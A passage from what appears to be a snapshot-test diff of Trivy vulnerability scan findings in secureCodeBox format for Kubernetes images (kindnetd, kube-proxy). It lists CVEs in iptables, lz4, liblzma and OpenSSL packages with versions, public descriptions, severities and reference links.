"https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip4tc2", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip6tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-11360", + "installedVersion": "1.8.5-3~bpo10+1", + "packageName": "libip6tc2", + "references": [ + "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "https://access.redhat.com/security/cve/CVE-2019-11360", + "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "https://www.cve.org/CVERecord?id=CVE-2019-11360", + ], + }, + "category": "Vulnerability", + "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "iptables: buffer overflow in iptables-restore", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-11360", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-11360", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "1.8.3-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3520", + "installedVersion": "1.8.3-1", + "packageName": "liblz4-1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2021-3520", + "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", + "https://errata.almalinux.org/8/ALSA-2021-2575.html", + "https://errata.rockylinux.org/RLSA-2021:2575", + "https://github.com/lz4/lz4/pull/972", + "https://linux.oracle.com/cve/CVE-2021-3520.html", + "https://linux.oracle.com/errata/ELSA-2021-2575.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", + "https://security.netapp.com/advisory/ntap-20211104-0005/", + "https://ubuntu.com/security/notices/USN-4968-1", + "https://ubuntu.com/security/notices/USN-4968-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3520", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", + "name": "memory corruption due to an integer overflow bug caused by memmove argument", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://avd.aquasec.com/nvd/cve-2021-3520", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://access.redhat.com/security/cve/CVE-2021-3520", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://errata.almalinux.org/8/ALSA-2021-2575.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://errata.rockylinux.org/RLSA-2021:2575", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://github.com/lz4/lz4/pull/972", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://linux.oracle.com/cve/CVE-2021-3520.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://linux.oracle.com/errata/ELSA-2021-2575.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://security.netapp.com/advisory/ntap-20211104-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://ubuntu.com/security/notices/USN-4968-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://ubuntu.com/security/notices/USN-4968-2", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3520", + }, + { + "type": "URL", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-17543", + "installedVersion": "1.8.3-1", + "packageName": "liblz4-1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", + "https://access.redhat.com/security/cve/CVE-2019-17543", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", + "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", + "https://github.com/lz4/lz4/issues/801", + "https://github.com/lz4/lz4/pull/756", + "https://github.com/lz4/lz4/pull/760", + "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + "https://security.netapp.com/advisory/ntap-20210723-0001/", + "https://www.cve.org/CVERecord?id=CVE-2019-17543", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuoct2020.html", + ], + }, + "category": "Vulnerability", + "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Certificate policy check not enabled", + "name": "lz4: heap-based buffer overflow in LZ4_write32", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", + "value": "https://avd.aquasec.com/nvd/cve-2019-17543", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://access.redhat.com/security/cve/CVE-2019-17543", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://github.com/lz4/lz4/issues/801", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://github.com/lz4/lz4/pull/756", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://github.com/lz4/lz4/pull/760", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20210723-0001/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-17543", + }, + { + "type": "URL", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2020.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", + "fixedVersion": "5.2.4-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "5.2.4-1", + "packageName": "liblzma5", "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", - ], - }, - "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "openssl: RSA authentication weakness", - "references": 